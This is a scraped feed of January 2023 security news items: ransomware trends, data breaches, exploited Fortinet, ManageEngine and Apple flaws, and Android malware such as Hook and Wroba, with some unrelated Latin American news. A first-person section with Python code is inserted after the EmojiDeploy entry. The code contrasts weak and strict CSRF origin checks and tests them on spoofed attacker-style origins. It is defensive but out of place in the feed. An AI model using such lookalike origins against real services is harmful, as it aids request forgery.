                The post Ransomware revenue significantly down over 2022 appeared first on Malwarebytes Labs.

                "

                Autosummary: Image courtesy of Chainalysis Payments, not attacks This decline could be explained in a number of ways: Fewer attacks Lower ransom demands or demand being negotiated down Fewer victims willing to pay According to our own research and Chainalysis, the declining numbers are mainly due to victim organizations increasingly refusing to pay ransomware attackers. "


                Apple backported patches for CVE-2022-42856 zero-day on older iPhones, iPads

                exploits
                2023-01-23 https://securityaffairs.com/141221/security/apple-backported-patches-cve-2022-42856.html

                Apple has backported the security updates for the zero-day vulnerability CVE-2022-42856 to older iPhones and iPads. On December 2022, Apple released security updates to address a new zero-day vulnerability, tracked as CVE-2022-42856, that is actively exploited in attacks against iPhones. The IT giant released security bulletins for iOS/iPadOS 15.7.2, Safari 16.2, tvOS 16.2, and macOS Ventura 13.1. Apple addressed […]

                The post Apple backported patches for CVE-2022-42856 zero-day on older iPhones, iPads appeared first on Security Affairs.

                "

                Autosummary: On December 14, 2022, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities Catalog and ordered federal agencies to address it by January 04, 2022. The company addressed the zero-day bug with improved state handling for the following devices: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation). "


                Key takeaways from Malwarebytes 2023 State of Mobile Cybersecurity

                exploits government ciber
                2023-01-23 https://www.malwarebytes.com/blog/business/2023/01/key-takeaways-from-malwarebytes-2023-state-of-mobile-cybersecurity-survey

                Categories: Business

                We asked 250 schools and hospitals about their mobile security posture, including Chromebooks. Here’s what we found out.


                The post Key takeaways from Malwarebytes 2023 State of Mobile Cybersecurity appeared first on Malwarebytes Labs.

                "

                Autosummary: "


                Roaming Mantis uses new DNS changer in its Wroba mobile malware

                exploits
                2023-01-22 https://securityaffairs.com/141137/malware/roaming-mantis-wroba-malware.html

                Roaming Mantis threat actors were observed using a new variant of their mobile malware Wroba to hijack the DNS settings of Wi-Fi routers. Researchers from Kaspersky observed Roaming Mantis threat actors using an updated variant of their mobile malware Wroba to compromise Wi-Fi routers and hijack DNS settings. Roaming Mantis surfaced in March 2018 when it hacked routers in Japan to […]

                The post Roaming Mantis uses new DNS changer in its Wroba mobile malware appeared first on Security Affairs.

                "

                Autosummary: "


                FanDuel discloses data breach caused by recent MailChimp hack

                financial
                2023-01-22 https://www.bleepingcomputer.com/news/security/fanduel-discloses-data-breach-caused-by-recent-mailchimp-hack/
                The FanDuel sportsbook and betting site is warning customers that their names and email addresses were exposed in a January 2023 MailChimp security breach, urging users to remain vigilant against phishing emails. [...] "

                Autosummary: FanDuel also stressed that this was not a breach of their systems or FanDuel user accounts and that the hackers did not acquire "passwords, financial account information, or other personal information" during the breach. "


                FanDuels warns of data breach after customer info stolen in vendor hack

                financial
                2023-01-22 https://www.bleepingcomputer.com/news/security/fanduels-warns-of-data-breach-after-customer-info-stolen-in-vendor-hack/
                The FanDuel sportsbook and betting site is warning customers that their names and email addresses were exposed in a January 2023 MailChimp security breach, urging users to remain vigilant against phishing emails. [...] "

                Autosummary: FanDuel also stressed that this was not a breach of their systems or FanDuel user accounts and that the hackers did not acquire "passwords, financial account information, or other personal information" during the breach. "


                Peru protests: Historic building in Lima catches fire as protests continue

                latam ransomware
                2023-01-21 https://www.bbc.co.uk/news/world-latin-america-64356109?at_medium=RSS&at_campaign=KARANGA
                Authorities are yet to report how the building, in Lima's Plaza San Martín, caught fire. "

                Autosummary: "


                Chinese firm Catl to develop huge Bolivian lithium deposit

                latam
                2023-01-21 https://www.bbc.co.uk/news/world-latin-america-64355970?at_medium=RSS&at_campaign=KARANGA
                Bolivia is rich in a metal vital for electric cars, and a Chinese battery maker will mine it. "

                Autosummary: "


                Riot Games hacked, delays game patches after security breach

                industry
                2023-01-21 https://www.bleepingcomputer.com/news/security/riot-games-hacked-delays-game-patches-after-security-breach/
                Riot Games, the video game developer and publisher behind League of Legends and Valorant, says it will delay game patches after its development environment was compromised. [...] "

                Autosummary: "This issue may impact our ability to release the full scope of balance changes planned, but we're working to implement the most meaningful of those possible through a hotfix at our scheduled patch time," the TFT team added. "


                Beware: Hackers now use OneNote attachments to spread malware

                exploits
                2023-01-21 https://www.bleepingcomputer.com/news/security/beware-hackers-now-use-onenote-attachments-to-spread-malware/
                Threat actors now use OneNote attachments in phishing emails that infect victims with remote access malware which can be used to install further malware, steal passwords, or even cryptocurrency wallets. [...] "

                Autosummary: Protecting against these threats Once installed, this type of malware allows threat actors to remotely access a victim’s device to steal files, saved browser passwords, take screenshots, and in some cases, even record video using webcams. From samples found by BleepingComputer, these malspam emails pretend to be DHL shipping notifications, invoices, ACH remittance forms, mechanical drawings, and shipping documents. "


                Peru protests: Machu Picchu closed indefinitely and tourists stranded

                latam
                2023-01-21 https://www.bbc.co.uk/news/world-latin-america-64360531?at_medium=RSS&at_campaign=KARANGA
                Thousands of visitors to the tourist site have been stranded as violent protests rock the country. "

                Autosummary: "


                Hackers now use Microsoft OneNote attachments to spread malware

                exploits
                2023-01-21 https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/
                Threat actors now use OneNote attachments in phishing emails that infect victims with remote access malware which can be used to install further malware, steal passwords, or even cryptocurrency wallets. [...] "

                Autosummary: Protecting against these threats Once installed, this type of malware allows threat actors to remotely access a victim’s device to steal files, saved browser passwords, take screenshots, and in some cases, even record video using webcams. From samples found by BleepingComputer, these malspam emails pretend to be DHL shipping notifications, invoices, ACH remittance forms, mechanical drawings, and shipping documents. "


                Brazil Congress riots: President Lula sacks army commander

                latam industry
                2023-01-21 https://www.bbc.co.uk/news/world-latin-america-64362096?at_medium=RSS&at_campaign=KARANGA
                General Julio Cesar de Arruda is the latest person in the military to lose their position. "

                Autosummary: "


                Chinese Hackers Exploited Recent Fortinet Flaw as 0-Day to Drop Malware

                exploits
                2023-01-20 https://thehackernews.com/2023/01/new-chinese-malware-spotted-exploiting.html
                A suspected China-nexus threat actor exploited a recently patched vulnerability in Fortinet FortiOS SSL-VPN as a zero-day in attacks targeting a European government entity and a managed service provider (MSP) located in Africa. Telemetry evidence gathered by Google-owned Mandiant indicates that the exploitation occurred as early as October 2022, at least nearly two months before fixes were "

                Autosummary: "


                Chinese hackers used recently patched FortiOS SSL-VPN flaw as a zero-day in October

                exploits
                2023-01-20 https://securityaffairs.com/141052/hacking/fortios-ssl-vpn-zero-day.html

                An alleged Chinese threat actor was observed exploiting the recently patched CVE-2022-42475 vulnerability in FortiOS SSL-VPN. Researchers from Mandiant reported that suspected Chinese threat actors exploited the recently patched CVE-2022-42475 vulnerability in FortiOS SSL-VPN as a zero-day. According to the security firm, the vulnerability was exploited in attacks against a series of targets, including a […]

                The post Chinese hackers used recently patched FortiOS SSL-VPN flaw as a zero-day in October appeared first on Security Affairs.

                "

                Autosummary: "


                LAUSD says Vice Society ransomware gang stole contractors’ SSNs

                exploits ransomware
                2023-01-20 https://www.bleepingcomputer.com/news/security/lausd-says-vice-society-ransomware-gang-stole-contractors-ssns/
                Los Angeles Unified School District (LAUSD), the second-largest school district in the United States, says the Vice Society ransomware gang has stolen files containing contractors' personal information, including Social Security Numbers (SSNs). [...] "

                Autosummary: "Through our ongoing investigation, we determined that between July 31, 2022, and September 3, 2022, an unauthorized actor accessed and acquired certain files maintained on our servers," the school district said in data breach notification letters sent to affected individuals. "


                New Boldmove Linux malware used to backdoor Fortinet devices

                exploits
                2023-01-20 https://www.bleepingcomputer.com/news/security/new-boldmove-linux-malware-used-to-backdoor-fortinet-devices/
                Suspected Chinese hackers exploited a recently disclosed FortiOS SSL-VPN vulnerability as a zero-day in December, targeting a European government and an African MSP with a new custom "BOLDMOVE" Linux and Windows malware. [...] "

                Autosummary: The new BOLDMOVE malware BOLDMOVE is a full-featured backdoor written in C that enables Chinese hackers to gain higher-level control over the device, with the Linux version specifically created to run on FortiOS devices. "


                Ransomware attack hit KFC and Pizza Hut stores in the UK

                exploits
                2023-01-20 https://www.bitdefender.com/blog/hotforsecurity/ransomware-attack-hit-kfc-and-pizza-hut-stores-in-the-uk/
                Anyone fancying a quick bite to eat in the UK may have found their choices more limited than usual on the high street. Nearly 300 fast food restaurants, including branches of KFC and Pizza Hut, were forced to close following a ransomware attack against parent company Yum! Brands. Read more in my article on the Hot for Security blog. "

                Autosummary: What has not yet been made public, and may not even be known to those investigating the breach, is how long hackers might have had access to the company's IT infrastructure, and how they might have been able to gain access to what should have been a secure system. "


                Roaming Mantis Spreading Mobile Malware That Hijacks Wi-Fi Routers' DNS Settings

                exploits
                2023-01-20 https://thehackernews.com/2023/01/roaming-mantis-spreading-mobile-malware.html
                Threat actors associated with the Roaming Mantis attack campaign have been observed delivering an updated variant of their patent mobile malware known as Wroba to infiltrate Wi-Fi routers and undertake Domain Name System (DNS) hijacking. Kaspersky, which carried out an analysis of the malicious artifact, said the feature is designed to target specific Wi-Fi routers located in South Korea. "

                Autosummary: "


                Gamaredon Group Launches Cyberattacks Against Ukraine Using Telegram

                ciber
                2023-01-20 https://thehackernews.com/2023/01/gamaredon-group-launches-cyberattacks.html
                The Russian state-sponsored cyber espionage group known as Gamaredon has continued its digital onslaught against Ukraine, with recent attacks leveraging the popular messaging app Telegram to strike military and law enforcement sectors in the country. "The Gamaredon group's network infrastructure relies on multi-stage Telegram accounts for victim profiling and confirmation of geographic location, "

                Autosummary: Gamaredon, also known by names such as Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and Winterflounder, is known for its assaults against Ukrainian entities since at least 2013. "


                PayPal notifies 34942 users of data breach over credential stuffing attack

                financial
                2023-01-20 https://securityaffairs.com/141072/data-breach/paypal-data-breach-credential-stuffing.html

                PayPal is sending out data breach notifications to thousands of users because their accounts were compromised through credential stuffing attacks. PayPal announced that 34942 customers’ accounts were compromised between December 6 and December 8. The company added that the unauthorized accesses were the result of credential stuffing attacks and that its systems were not […]

                The post PayPal notifies 34942 users of data breach over credential stuffing attack appeared first on Security Affairs.

                "

                Autosummary: "


                Exploits released for two Samsung Galaxy App Store vulnerabilities

                exploits
                2023-01-20 https://www.bleepingcomputer.com/news/security/exploits-released-for-two-samsung-galaxy-app-store-vulnerabilities/
                Two vulnerabilities in the Galaxy App Store, Samsung's official repository for its devices, could enable attackers to install any app in the Galaxy Store without the user's knowledge or to direct victims to a malicious web location. [...] "

                Autosummary: Depending on the attacker’s motives, the attack may lead to app UI interaction, access to sensitive information, or crashing apps. "


                Critical ManageEngine RCE bug now exploited to open reverse shells

                exploits
                2023-01-20 https://www.bleepingcomputer.com/news/security/critical-manageengine-rce-bug-now-exploited-to-open-reverse-shells/
                A critical remote code execution (RCE) vulnerability affecting multiple Zoho ManageEngine products is now being exploited in attacks. [...] "

                Autosummary: IPs linked to CVE-2022-47966 exploitation (GreyNoise) Post-exploitation activity on compromised devices While investigating attacks that led to the compromise of some of its customers' ManageEngine instances, Rapid7 also observed post-exploitation activity. "


                Crypto lender Genesis files for bankruptcy

                financial
                2023-01-20 https://www.bbc.co.uk/news/technology-64343377?at_medium=RSS&at_campaign=KARANGA
                The cryptocurrency lender’s collapse is the latest blow to the sector. "

                Autosummary: "


                The Week in Ransomware - January 20th 2023 - Targeting Crypto Exchanges

                exploits ransomware
                2023-01-20 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-20th-2023-targeting-crypto-exchanges/
                There has been quite a bit of ransomware news this week, with crypto exchanges being seized for alleged money laundering and researchers providing fascinating reports on the behavior of ransomware operators. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @demonslay335, @malwrhunterteam, @Seifreed, @billtoulas, @PolarToffee, @struppigel, @serghei, @fwosar, @BleepinComputer, @Ionut_Ilascu, @chainalysis, @coveware, @BrettCallow, @jgreigj, @pcrisk, @Avast, and @Jon__DiMaggio. Yum! Brands, the fast food brand operator of KFC, Pizza Hut, Taco Bell, and The Habit Burger Grill fast-food restaurant chains, has been targeted by a ransomware attack that forced the closure of 300 locations in the United Kingdom. "


                Ransomware money laundering operation disrupted, founder arrested

                financial exploits
                2023-01-20 https://www.malwarebytes.com/blog/news/2023/01/bitzlato-ransomware-laundry-operation-sees-founder-arrested

                Categories: News

                Categories: Ransomware

                Tags: Cryptocurrency exchange

                Tags: Bitzlato

                Tags: Conti

                Tags: ransomware

                Tags: Hydra

                Tags: dark web marketplace

                The China-based cryptocurrency exchange Bitzlato is accused of processing over $700 million of illicit funds.


                The post Ransomware money laundering operation disrupted, founder arrested appeared first on Malwarebytes Labs.

                "

                Autosummary: As stated by Assistant Attorney General Kenneth A. Polite, Jr. of the Justice Department’s Criminal Division: As alleged, the defendant helped operate a cryptocurrency exchange that failed to implement required anti-money laundering safeguards and enabled criminals to profit from their wrongdoing, including ransomware and drug trafficking. "


                T-Mobile suffered a new data breach, 37 million accounts have been compromised

                financial
                2023-01-20 https://securityaffairs.com/141086/data-breach/t-mobile-data-breach-5.html

                Bad news for T-Mobile, the company disclosed a new data breach that resulted in the theft of data belonging to 37 customer accounts. T-Mobile suffered a new data breach, threat actor stole the personal information of 37 million current postpaid and prepaid customer accounts. The telecommunications company discovered the intrusion on January 5, 2023, the attackers obtained […]

                The post T-Mobile suffered a new data breach, 37 million accounts have been compromised appeared first on Security Affairs.

                "

                Autosummary: “Rather, the impacted API is only able to provide a limited set of customer account data, including name, billing address, email, phone number, date of birth, T-Mobile account number and information such as the number of lines on the account and plan features.” "


                Ransomware payments down 40% in 2022 – Week in security with Tony Anscombe

                exploits
                2023-01-20 https://www.welivesecurity.com/videos/whats-behind-drop-ransomware-payments-week-security-tony-anscombe/

                Ransomware revenue plunges to $456 million in 2022 as more victims refuse to pay up. Here's what to make of the trend.

                The post Ransomware payments down 40% in 2022 – Week in security with Tony Anscombe appeared first on WeLiveSecurity

                "

                Autosummary: "


                Abacus Group acquires two cybersecurity consulting companies

                ciber
                2023-01-19 https://www.helpnetsecurity.com/2023/01/19/abacus-group-gotham-security/

                Abacus Group acquired two boutique cybersecurity consulting companies, Gotham Security and its parent company, GoVanguard, both of which have unparalleled track records of excellence in the cyber arena. Gotham Security, as the new business will be known, will be a subsidiary of Abacus Group but continue to operate independently. The acquisition marks a milestone in Abacus Group’s expansion from a security-focussed managed service provider (MSP) to a full-bodied managed security service provider (MSSP) with an … More

                The post Abacus Group acquires two cybersecurity consulting companies appeared first on Help Net Security.

                "

                Autosummary: Abacus Group will acquire a comprehensive set of information security capabilities to provide clients with real-world, actionable insight, including penetration testing, red teaming, tabletop exercises, risk and compliance gap assessments, and threat hunting services. "


                Bitzlato Crypto Exchange Founder Arrested for Aiding Cybercriminals

                ciber
                2023-01-19 https://thehackernews.com/2023/01/bitzlato-crypto-exchange-founder.html
                The U.S. Department of Justice (DoJ) on Wednesday announced the arrest of Anatoly Legkodymov (aka Gandalf and Tolik), the cofounder of Hong Kong-registered cryptocurrency exchange Bitzlato, for allegedly processing $700 million in illicit funds. The 40-year-old Russian national, who was arrested in Miami, was charged in a U.S. federal court with "conducting a money transmitting business that "

                Autosummary: The 40-year-old Russian national, who was arrested in Miami, was charged in a U.S. federal court with "conducting a money transmitting business that transported and transmitted illicit funds and that failed to meet U.S. regulatory safeguards, including anti-money laundering requirements," the DoJ said. "


                US CISA adds Centos Web Panel RCE CVE-2022-44877 to its Known Exploited Vulnerabilities Catalog

                exploits
                2023-01-19 https://securityaffairs.com/140989/security/centos-web-panel-rce-known-exploited-vulnerabilities-catalog.html

                US CISA added the vulnerability CVE-2022-44877 in the CentOS Control Web Panel utility to its Known Exploited Vulnerabilities Catalog. The US CISA added the Centos Web Panel 7 unauthenticated remote code execution flaw (CVE-2022-44877) to its Known Exploited Vulnerabilities Catalog. The flaw impacts versions before 0.9.8.1147; it was addressed with the release of version 0.9.8.1147 on October 25, […]

                The post US CISA adds Centos Web Panel RCE CVE-2022-44877 to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                Exploit released for critical ManageEngine RCE bug, patch now

                exploits
                2023-01-19 https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-manageengine-rce-bug-patch-now/
                Proof-of-concept exploit code is now available for a remote code execution (RCE) vulnerability in multiple Zoho ManageEngine products. [...] "

                Autosummary: CVE-2022-47966 PoC exploit (Horizon3) Horizon3 has previously released exploit code for other critical security flaws in several different products, including: CVE-2022-28219, a critical flaw in Zoho ManageEngine ADAudit Plus that lets attackers compromise Active Directory accounts, CVE-2022-1388, a critical vulnerability allowing remote code execution in F5 BIG-IP networking devices, and CVE-2022-22972, a critical authentication bypass bug in multiple VMware products that can let threat actors gain admin privileges. "


                New "Blank Image" attack hides phishing scripts in SVG files

                financial
                2023-01-19 https://www.bleepingcomputer.com/news/security/new-blank-image-attack-hides-phishing-scripts-in-svg-files/
                An unusual phishing technique has been observed in the wild, hiding empty SVG files inside HTML attachments pretending to be DocuSign documents. [...] "

                Autosummary: Email used in the latest phishing campaign (Avanan) HTML files are popular among phishing actors because they are typically ignored by email security products and thus have higher chances of reaching the target’s inbox. "


                Ransomware profits drop 40% in 2022 as victims refuse to pay

                exploits
                2023-01-19 https://www.bleepingcomputer.com/news/security/ransomware-profits-drop-40-percent-in-2022-as-victims-refuse-to-pay/
                Ransomware gangs extorted from victims about $456.8 million throughout 2022, a drop of roughly 40% from the record-breaking $765 million recorded in the previous two years. [...] "

Autosummary: Despite the multiple extortion tactics employed by ransomware operators (e.g. file encryption, DDoS attacks, threats to leak stolen data or to inform data protection authorities of a breach), a growing number of victims refuse to meet the threat actors’ demands. "


                LockBit ransomware – what you need to know

                exploits ransomware
                2023-01-19 https://www.tripwire.com/state-of-security/lockbit-ransomware-what-you-need-know
It is the world’s most active ransomware group - responsible for an estimated 40% of all ransomware infections worldwide. Find out what you need to know about LockBit in my article on the Tripwire State of Security blog. "

Autosummary: LockBit is a ransomware-as-a-service (RaaS) operation, meaning that other criminals pay to become an affiliate, launching attacks and sharing a percentage of their earnings with the original LockBit gang. I guess if they are hitting so many companies, these LockBit guys must be making a lot of money. When the US authorities charged a man in connection with the LockBit ransomware in November 2022, they claimed that it had been deployed against at least 1,000 victims in the United States and around the world, making at least $100 million worth of ransom demands. Use hard-to-crack, unique passwords to protect sensitive data and accounts, and enable multi-factor authentication. "


                Bitzlato cryptocurrency exchange shut down by authorities, accused of cybercriminal links

                ciber
                2023-01-19 https://grahamcluley.com/bitzlato-cryptocurrency-exchange-shut-down-by-authorities-accused-of-cybercriminal-links/
                The Bitzlato cryptocurrency exchange has had its website seized by the authorities, after its Russian founder was charged with processing more than US $700m worth of "dirty money" on behalf of criminals. "

                Autosummary: "


                New Microsoft Azure Vulnerability Uncovered — EmojiDeploy for RCE Attacks

                exploits
                2023-01-19 https://thehackernews.com/2023/01/new-microsoft-azure-vulnerability.html
                A new critical remote code execution (RCE) flaw discovered impacting multiple services related to Microsoft Azure could be exploited by a malicious actor to completely take control of a targeted application. "The vulnerability is achieved through CSRF (cross-site request forgery) on the ubiquitous SCM service Kudu," Ermetic researcher Liv Matan said in a report shared with The Hacker News. "By "

                Autosummary: "
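The entry above says EmojiDeploy reaches code execution through CSRF against the Kudu SCM service, but does not spell out which server-side check fell short, and this block does not claim to reconstruct it. What follows is an added example (my code, not Ermetic's, Microsoft's or Kudu's) of the general lesson for any state-changing endpoint: a prefix-style origin check that looks correct beside a strict gate that reduces the `Origin` (or, as a fallback, the `Referer`) to an exact `scheme://host[:port]` and compares it against an allowlist. The allowed origins and request headers are constructed for the example.

```python
from urllib.parse import urlsplit

# Constructed for this example: the exact origins our own front end is served from.
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def origin_check_weak(origin):
    """Prefix match. Reads as 'only our host', but any value that merely begins with the
    string passes: https://app.example.com.attacker.test, https://app.example.com@attacker.test"""
    return bool(origin) and origin.startswith("https://app.example.com")


def origin_of(url):
    """Reduce an Origin header value or a URL to https://host[:port], lowercased.
    Returns None for anything that is not an absolute https URL with a plain host."""
    if not url:
        return None
    try:
        parts = urlsplit(url.strip())
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return None
    if parts.scheme != "https" or not parts.hostname or parts.username is not None:
        return None
    host = parts.hostname.lower()
    if port is not None and port != 443:
        host = f"{host}:{port}"
    return f"https://{host}"


def csrf_request_allowed(method, headers, allowed=ALLOWED_ORIGINS):
    """Gate for state-changing requests: exact-origin match on Origin, falling back to the
    Referer's origin. A missing or 'null' source fails closed instead of being waved through."""
    if method.upper() in SAFE_METHODS:
        return True
    lowered = {k.lower(): v for k, v in headers.items()}
    source = lowered.get("origin") or lowered.get("referer")
    if not source or source.strip().lower() == "null":
        return False
    return origin_of(source) in allowed


if __name__ == "__main__":
    for origin in ("https://app.example.com", "https://app.example.com.attacker.test",
                   "https://app.example.com@attacker.test", None):
        weak = origin_check_weak(origin)
        strict = csrf_request_allowed("POST", {"Origin": origin} if origin else {})
        print(f"{str(origin):45} weak={weak!s:5} strict={strict}")
```

Two design points worth keeping: the strict gate never treats an absent header as a pass (browsers may strip `Referer`, but a cross-site `POST` from a browser always carries `Origin`), and it compares whole origins rather than substrings, so a lookalike host or a userinfo trick cannot satisfy it.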


                Android Users Beware: New Hook Malware with RAT Capabilities Emerges

                exploits
                2023-01-19 https://thehackernews.com/2023/01/android-users-beware-new-hook-malware.html
The threat actor behind the BlackRock and ERMAC Android banking trojans has unleashed yet another malware for rent called Hook that introduces new capabilities to access files stored in the devices and create a remote interactive session. ThreatFabric, in a report shared with The Hacker News, characterized Hook as a novel ERMAC fork that’s advertised for sale for $7,000 per month while featuring "

                Autosummary: "


                Ransomware gang steals data from KFC, Taco Bell, and Pizza Hut brand owner

                exploits
                2023-01-19 https://www.bleepingcomputer.com/news/security/ransomware-gang-steals-data-from-kfc-taco-bell-and-pizza-hut-brand-owner/
                Yum! Brands, the fast food brand operator of KFC, Pizza Hut, Taco Bell, and The Habit Burger Grill fast-food restaurant chains, has been targeted by a ransomware attack that forced the closure of 300 locations in the United Kingdom. [...] "

Autosummary: "


                Roaming Mantis’ Android malware adds DNS changer to hack WiFi routers

                exploits
                2023-01-19 https://www.bleepingcomputer.com/news/security/roaming-mantis-android-malware-adds-dns-changer-to-hack-wifi-routers/
                Starting in September 2022, the "Roaming Mantis" credential theft and malware distribution campaign was observed using a new version of the Wroba.o/XLoader Android malware that incorporates a function for detecting specific WiFi routers and changing their DNS. [...] "

Autosummary: XLoader now features 113 hard-coded strings used to detect specific WiFi router models, and if there’s a match, the malware performs the DNS hijacking step by changing the router’s settings. "


                New "Hook" Android malware lets hackers remotely control your phone

                exploits
                2023-01-19 https://www.bleepingcomputer.com/news/security/new-hook-android-malware-lets-hackers-remotely-control-your-phone/
                A new Android malware named "Hook" is being sold by cybercriminals, boasting it can remotely take over mobile devices in real-time using VNC (virtual network computing). [...] "

Autosummary: Commands include: unlock the device; scroll up/down; simulate a long-press event; simulate a click at a specific coordinate; set the clipboard value to a UI element with a specific coordinates value; simulate a click on a UI element with a specific text value; set a UI element value to a specific text. Apart from the above, a "File Manager" command turns the malware into a file manager, allowing the threat actors to get a list of all files stored in the device and download specific files of their choice. "


                T-Mobile hacked to steal data of 37 million accounts in API data breach

                financial
                2023-01-19 https://www.bleepingcomputer.com/news/security/t-mobile-hacked-to-steal-data-of-37-million-accounts-in-api-data-breach/
                T-Mobile disclosed a new data breach after a threat actor stole the personal information of 37 million current postpaid and prepaid customer accounts through one of its Application Programming Interfaces (APIs). [...] "

                Autosummary: "Rather, the impacted API is only able to provide a limited set of customer account data, including name, billing address, email, phone number, date of birth, T-Mobile account number and information such as the number of lines on the account and plan features," T-Mobile said. "


                Experts released PoC exploit for critical Zoho ManageEngine RCE flaw

                exploits
                2023-01-19 https://securityaffairs.com/141018/hacking/zoho-manageengine-rce-poc.html

                Researchers released Proof-of-concept exploit code for remote code execution flaw CVE-2022-47966 impacting multiple Zoho ManageEngine products. The CVE-2022-47966 flaw is an unauthenticated remote code execution vulnerability that impacts multiple Zoho products with SAML SSO enabled in the ManageEngine setup. The issue also impacts products that had the feature enabled in the past. The root cause of […]

                The post Experts released PoC exploit for critical Zoho ManageEngine RCE flaw appeared first on Security Affairs.

                "

Autosummary: "


                Tech support scammers are still at it: Here’s what to look out for in 2023

                financial
                2023-01-19 https://www.welivesecurity.com/2023/01/19/tech-support-scammers-still-at-it-what-look-out-for/

                Hello, is it me you’re looking for? Fraudsters still want to help you fix a computer problem you never had in the first place.

                The post Tech support scammers are still at it: Here’s what to look out for in 2023 appeared first on WeLiveSecurity

                "

                Autosummary: In due course, deceptive ads, bogus pop-ups, fake support websites and attacks involving malicious and malware-like programs emerged, with people’s computer screens showing alerts that attempt to convince them that something is wrong with their machine. Indeed, as the scams became more diversified and sophisticated, they involved a shift where the victim is lured into calling the scammer (often after visiting a dodgy website), rather than scammers cold-calling people in a largely random manner. Some of the newer tactics now also highlighted by the FBI involve these steps: The victim receives an email from a legitimate-looking domain, warning of an imminent and automatic renewal of a technical service (i.e., a warranty) for several hundred dollars. "


                Peru protests: More deaths reported as demonstrators descend on Lima

                latam
                2023-01-19 https://www.bbc.co.uk/news/world-latin-america-64327180?at_medium=RSS&at_campaign=KARANGA
                Clashes are reported in the capital Lima, where anti-government activists have been gathering. "

                Autosummary: "


                New FTX boss John Ray could bring back bankrupt crypto firm

                financial
                2023-01-19 https://www.bbc.co.uk/news/technology-64338010?at_medium=RSS&at_campaign=KARANGA
                John Ray said he may restart the platform to try to recover "value" for customers who lost money. "

                Autosummary: "


                Cybersecurity in 2023: Russian escalation, Chinese espionage, Iranian “hacktivism”

                ciber
                2023-01-18 https://www.helpnetsecurity.com/2023/01/18/cybersecurity-in-2023-russian-escalation-chinese-espionage-iranian-hacktivism/

                In 2022, state-sponsored cyber activity has been drawn into sharp focus, ransomware continued to dominate as the primary threat facing organizations, and there have been several highly publicized incidents. Beyond the headlines, there have been some interesting shifts in both tools and tactics of cyber adversaries. What can we learn from the past 12 months as we look ahead at the trends that will shape the threat landscape in 2023? State-sponsored activity In 2022, we … More

                The post Cybersecurity in 2023: Russian escalation, Chinese espionage, Iranian “hacktivism” appeared first on Help Net Security.

                "

Autosummary: Ransomware-as-a-Service will flourish: the Ransomware-as-a-Service (RaaS) landscape will continue to be dominated by a handful of organized cybercrime groups operating a limited number of highly active schemes. We also expect that new revelations will emerge of large scale, covert intelligence gathering by Russian state-sponsored threat actors, enabled by the exploitation of cloud environments, internet backbone infrastructure, or pervasive identity management systems. Russian cyber activity will be split between targeting Ukraine and advancing its broader intelligence objectives: with no prospect of an immediate end to the conflict in Ukraine, we can expect more conflict-related cyber activity aimed at degrading Ukraine’s critical infrastructure and government services and collecting foreign intelligence useful to the Russian government from entities engaged in the war effort. "


                CISA Warns of Flaws in Siemens, GE Digital, and Contec Industrial Control Systems

                industry
                2023-01-18 https://thehackernews.com/2023/01/cisa-warns-of-flaws-in-siemens-ge.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published four Industrial Control Systems (ICS) advisories, calling out several security flaws affecting products from Siemens, GE Digital, and Contec. The most critical of the issues have been identified in Siemens SINEC INS that could lead to remote code execution via a path traversal flaw (CVE-2022-45092, CVSS score: 9.9) "

                Autosummary: "


                Google ads increasingly pointing to malware

                exploits
                2023-01-18 https://www.helpnetsecurity.com/2023/01/18/google-ads-increasingly-pointing-to-malware/

The FBI has recently warned the public about search engine ads pushing malware disguised as legitimate software – an old tactic that has lately resulted in too many malicious ads served to users searching for software, cracked software, drivers – anything that can be downloaded, really – via Google and Bing. The recent explosion of search engine malvertising Malware peddlers employ a variety of methods to deliver their wares to unsuspecting users: Malicious links or … More

                The post Google ads increasingly pointing to malware appeared first on Help Net Security.

                "

                Autosummary: Some of these campaigns have been going on since late last year, and mostly target users searching to download popular software (e.g., Audacity, Blender 3D, GIMP, Notepad++, Microsoft Teams, Discord, Microsoft OneNote, 7zip, OBS, etc.). "


                Iranian Government Entities Under Attack by New Wave of BackdoorDiplomacy Attacks

                government
                2023-01-18 https://thehackernews.com/2023/01/iranian-government-entities-under.html
                The threat actor known as BackdoorDiplomacy has been linked to a new wave of attacks targeting Iranian government entities between July and late December 2022. Palo Alto Networks Unit 42, which is tracking the activity under its constellation-themed moniker Playful Taurus, said it observed the government domains attempting to connect to malware infrastructure previously identified as associated "

                Autosummary: "


                Vulnerable NetComm routers and a public PoC exploit (CVE-2022-4873, CVE-2022-4874)

                exploits
                2023-01-18 https://www.helpnetsecurity.com/2023/01/18/cve-2022-4873-cve-2022-4874/

                Two vulnerabilities (CVE-2022-4873, CVE-2022-4874) found in three NetComm router models could be exploited to achieve remote code execution on vulnerable devices, and there’s a public PoC chaining them, CERT/CC has warned. The good news is that they’ve been fixed by NetComm and the patches have been implemented in new firmware released in November 2022. About CVE-2022-4873 and CVE-2022-4874 CVE-2022-4874 is an authentication bypass flaw and CVE-2022-4873 is a stack based buffer overflow vulnerability that allows … More

                The post Vulnerable NetComm routers and a public PoC exploit (CVE-2022-4873, CVE-2022-4874) appeared first on Help Net Security.

                "

                Autosummary: "


                A couple of bugs can be chained to hack Netcomm routers

                exploits
                2023-01-18 https://securityaffairs.com/140967/iot/netcomm-tp-link-routers-critical-flaws.html

A couple of critical vulnerabilities have been discovered in Netcomm routers, and experts warn of their potential exploitation in the wild. The vulnerabilities discovered in the Netcomm routers are a stack-based buffer overflow and an authentication bypass, respectively tracked as CVE-2022-4873 and CVE-2022-4874. Both issues impact the Netcomm router models NF20MESH, NF20, and NL1902 running software versions […]

                The post A couple of bugs can be chained to hack Netcomm routers appeared first on Security Affairs.

                "

Autosummary: "


                Bank of America starts restoring missing Zelle transactions

                financial
